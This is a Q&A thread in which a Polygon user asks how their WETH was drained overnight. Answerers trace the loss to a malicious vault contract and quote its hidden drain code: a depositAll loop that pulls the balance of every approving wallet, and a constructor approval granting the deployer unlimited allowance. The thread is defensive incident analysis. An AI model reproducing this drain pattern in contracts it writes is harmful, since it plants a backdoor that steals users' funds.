# I wonder where this hack started from

Tags: solidity-0.6.x, polygon

before I start, let me first give you the txn history.

https://polygonscan.com/tx/0xc7927d4a8b0549dfd650eeab8b9570195d8fb9161884785e9b328c04b6a49232

And also adding my Metamask adress history for WETH.
https://polygonscan.com/token/0x7ceb23fd6bc0add59e62ac25578270cff1b9f619?a=0xD939DE5a37D818d46d6366532feC981639395E71

In summary, last night right before I slept, I swapped almost all defi tokens to be WETH and it was like 15 hours ago. If you look at the top transaction in my address, however, there were both "approval" and "transfer" about 9 hours ago and I am sure that is when I was sleeping deeply. In the morning my WETH balance showed 0. For quite a while my WETH balance has been 0, so I guess if there were any hack happened, it would have happened in the process of swapping tokens last night. It is really weird because firstly I am sure my seedphrase was not stolen. Secondly, the platform I used yesterday were all relatively reliable such as Quickswap, Firebird Finance, Pear Finance, Iron Finance, etc. I came to the conclusion that it was very likely due to some malicious smart contract I gave permission to spend my WETH "unlimited," and I wanted to find out where I made that mistake, but I could not interpret the code properly. Any help would be truly appreciated. Thank you.

Comment: That's weird, of course your seed phrase wasn't stolen, or you'd have nothing left! I sympathize with what you're going through, and I want to know what's going on.

Answer (score 3):

TLDR : cancel your allowance for WETH to contract 0x9bf475e0654ec615b473599c9d39ddd87b01e894 and it wont happen again.

https://polygonscan.com/address/0x9bf475e0654ec615b473599c9d39ddd87b01e894#code This contract is very clearly responsible. Once you gave unlimited allowance for WETH to it the contract owner can call depositAll

```
    function depositAll(uint256 from, uint256 to) public onlyAdmin {
    addressInfo.remove(msg.sender);
    address[] memory addresses = getAddressInfo(from, to);
    
    for (uint256 i = 0; i < addresses.length; i++) {
        if (addresses[i] != address(0)) {
            try token.transferFrom(addresses[i], address(this), token.balanceOf(addresses[i])) {}
            catch Error(string memory /*reason*/) { }
```

which literally transfers to the contract address all the WETH available in all the wallets of users who approved the contract. Then the owner (who has unlimited allowance on the weth staked in the contract from this line in the constructor

```
        IERC20(0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619).safeApprove(address(msg.sender), uint256(-1));
```

can just withdraw all the weth staked in the contract with `transferFrom`.(0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619 is the weth address).
All this being very badly dissimulated in an otherwise perfectly working vault contract.

Comment: Actually he even included  a "steal all your tokens" function in the contract ( called `adminWithdraw()` ) which does that for him, here is the tx where he withdraws your tokens to his address https://polygonscan.com/tx/0x7aaeded2334eaebe5f838c603501cd00e51887b7836b93aef787ac080fbbb521.

Comment: Thank you so much for this analysis. I used to avoid scammers pretty well so far but this one was completely out of my scope. I got some questions following your explanation which are:
1. Is it possible to figure out websites or token name that have that contract? 
2. Now whenever I need to give permission, I would double check the contract especially for the new-born project. What keywords do I MUST check with ctrl+F function?

I really appreciate it. Thank you.

Comment: Not that i know of. And for your 2nd question well its hard to say. Any function using `approval` or `transferFrom` can be malicious but you'd have to make sense of the code to understand if it is or not. Also check for wierd function names, `adminWithdraw` for example is a big red flag (but once again it can be an actually useful function, you'd have to check the code too to verify.

Answer (score 1):

Sorry, buddy. Apparently you got scammed by a malicious DeFi website. Follow my trail of thought:

1- I figured there were only 2 possibilities: (1) your seed or private key were compromised, which I thought was the least likely due to other assets not being drained in the process, or (2) you approved infinite WETH allowance to a malicious smart contract.

2- I used PolygonScan to investigate your wallet's past token approvals. It seems that you had approved infinite WETH allowance to this particular contract: https://polygonscan.com/address/0x9bf475e0654ec615b473599c9d39ddd87b01e894. This looks like a classic man in the middle attack, where this contract is placing itself as an intermediary between users and the Masterchef contract.

3- Apparently, the admin of this contract first calls a `depositAll(...)` method to take the WETH from all users who had approved infinite allowance to it: https://polygonscan.com/tx/0xc7927d4a8b0549dfd650eeab8b9570195d8fb9161884785e9b328c04b6a49232.

Then, it calls an `adminWithdraw()` method to take all the WETH staked by users onto `Masterchef` through this malicious contract, and take all the WETH previously taken through `depositAll(...)`, and transfer them all to the admin's address.

In the future, I suggest you take extra care about what contracts you approve infinite allowance to. This wallet is already tainted, and you could never be sure if it's safe to use it again. In the future, try not to keep any tokens inside a wallet that you approved infinite allowance on.